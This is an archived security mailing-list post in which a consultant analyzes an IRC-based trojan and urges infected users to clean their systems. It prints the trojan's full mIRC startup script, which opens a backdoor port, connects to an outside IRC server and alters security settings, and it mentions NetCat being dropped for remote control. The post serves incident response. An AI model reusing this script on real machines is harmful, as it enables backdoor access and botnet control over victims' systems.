('binary' encoding is not supported, stored as-is) In-Reply-To: <F1E50062AEB5D411971E002035710A7304C3F950MSXDENUSR01>

One of the Microsoft PSS Security Specialist contacted me after reading my
analysis. I gave them a copy of the virus/trojan/malware I analyzed, and
I also expressed my concern about their analysis. I did not hear back
from them yesterday, but maybe we should give them couple days. However,
I still want to make sure everyone that was infected to run Anti-Trojan
software to remove any trojan and hacker tools. It's detailed in my
analysis.

http://groups.google.com/groups?dq=&start=25&hl=zh-TW&lr=&ie=UTF-8&oe=UTF-
8&group=microsoft.public.scripting.virus.discussion&selm=bf0f8e77.020908070
6.7f395b0c%40posting.google.com

I did point out that there was a file called "ncp.exe", which in fact was
NetCat, one of hacker's favorite tool that could possibly allow a hacker
to remote control the victims' systems... The other one is mt.exe, could
be a dDoS agent (not confirmed). MS is aware of these situations. Let's
make sure all the victims' out there are at least recovering their systems
properly!

Also, secedit.bat did NOT change the security policies. "DLL32NT.HLP" was
the actual text (mirc script) file that caused the problems...

Here is the actual script that got run:
+++++++++++++
on *:start:{ if ($exists(mdm.exe) == $false) { exit } | //run
mdm.exe /n /fh | //set %server DEM0N.daemon.sh | //set %timeout 10
| if ($portfree(60609) == $false) { exit } | if ($portfree(60609) ==
$true) { /socklisten blah 60609 } | //nick $read mdm.scr $+ $r(1,9)
| //timerc 1 4 //server %server $+ : $+ 6667 | //run mdm.exe /n /fh       
| //remini NT32.ini ident userid | //remini NT32.ini mirc user | //remini
NT32.ini mirc email | //writeini NT32.ini ident userid $read mdm.scr
| //writeini NT32.ini mirc user $randomgen($r(0,9)) | //writeini NT32.ini
mirc email $randomgen($r(0,9)) | //identd on $r(a,z) $+ $read mdm.scr $+ $r
(a,z) | //timercoolconnect -o 0 100 //server %server 6667 | //timer 1
1 //run -n secedit /configure /DB secedit.sdb /cfg $mircdir $+
tftp8675 /quiet | fos }
+++++++++++++

As I looked in further, the "designer" of this trojan/malware used "UPX
Executable Packer" from http://upx.sourceforge.net to compact the
taskmngr.exe (really a mirc 5.70 client), so it reduced the filesize from
(1.3M) to 442K. It also compacted so well, there are very few ASCII
characters to read from Hex Editor. Once you use UPX to decompress it,
you can read a lot more. I am still trying to see if anything was
modified. Please let me know if anyone find anything out there. I am not
sure if the mirc client has been modified...

The above script also opened a backdoor port 60609...

If you have more info, please pass along.

Regards,

Kyle Lai, CISSP, CISA
Kyle Lai Consulting
aladin168hotmail.com

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]